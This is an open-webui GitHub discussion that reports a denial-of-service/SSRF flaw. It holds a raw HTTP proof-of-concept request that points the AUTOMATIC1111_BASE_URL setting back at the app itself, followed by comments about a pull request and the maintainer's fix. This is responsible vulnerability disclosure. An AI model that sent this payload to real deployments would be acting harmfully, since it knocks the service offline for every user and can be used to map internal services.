### DISCUSSION TITLE
DDOS at Images URL Update endpoint

### DISCUSSION THREAD

**Discussion by 021w** [open-webui/open-webui#4400] [General]
# Summary
We have found a vulnerability,if user enters same application url in AUTOMATIC1111_BASE_URL parameter value due to which web application doesn't respond.
# PoC
POST /images/api/v1/url/update HTTP/1.1
Host: 192.168.88.128:3000
Content-Length: 84
Accept: application/json
authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjFmZTEyNDVkLTRiNjgtNGY5OC04ZjE2LTEyMzBlYjdmNjdmOSJ9.keh8I_zfLajbmvFCQG8Ah6OJbP3MRypuNuM0JXFK8Ug
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Content-Type: application/json
Origin: http://192.168.88.128:3000/
Referer: http://192.168.88.128:3000/admin/settings/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjFmZTEyNDVkLTRiNjgtNGY5OC04ZjE2LTEyMzBlYjdmNjdmOSJ9.keh8I_zfLajbmvFCQG8Ah6OJbP3MRypuNuM0JXFK8Ug
Connection: keep-alive

{"AUTOMATIC1111_BASE_URL":"[http://192.168.88.128:3000/","AUTOMATIC1111_API_AUTH":""}](http://192.168.88.128:3000/%22,%22AUTOMATIC1111_API_AUTH%22:%22%22%7D)
# impact
An attacker can enumerate internal services running and can disrupt web application access for all users which leads to DDOS attack.

**Comment by tjbck** [comment]
I encourage you to make a PR!

**Reply by 021w** [reply]
Hello, I saw that you closed the PR, I would like to know how you deal with this vulnerability，Since I have never submitted a PR, I don't know whether you closed the PR because of the formatting problem of my submission or other problems.

**Comment by 021w** [comment]
I write a PR:https://github.com/open-webui/open-webui/pull/4420,The url is judged in this endpoint. Please check whether it is OK to change the code like this.

**Comment by 021w** [comment]
![12](https://github.com/user-attachments/assets/aabdb458-5be1-4e74-b688-e71878c55f5a)
I saw that you have fixed this ssrf vulnerability, why didn't I receive any thanks，
